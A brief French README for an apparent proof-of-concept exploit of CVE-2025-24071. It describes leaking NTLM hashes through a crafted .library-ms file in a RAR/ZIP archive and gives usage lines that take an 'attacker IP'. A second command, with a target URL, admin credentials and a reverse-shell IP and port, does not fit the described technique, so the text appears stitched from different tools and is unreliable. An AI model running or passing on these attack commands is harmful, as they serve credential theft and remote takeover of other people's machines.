
Preuve de concept pour CVE-2025-24071, démontrant la fuite de hash NTLM via un fichier .library-ms conçu dans des archives RAR/ZIP, déclenchant l'authentification SMB lors de l'extraction.
CVE-2025-24071 : Fuite de hachage NTLM via extraction RAR/ZIP et fichier .library-ms
>>python poc.py
>>enter file name: your file name
>>enter IP: attacker IP
>>python3 poc.py --url http://domainname.com --user admin --password password --reverse-ip 10.10.10.10 --reverse-port 8888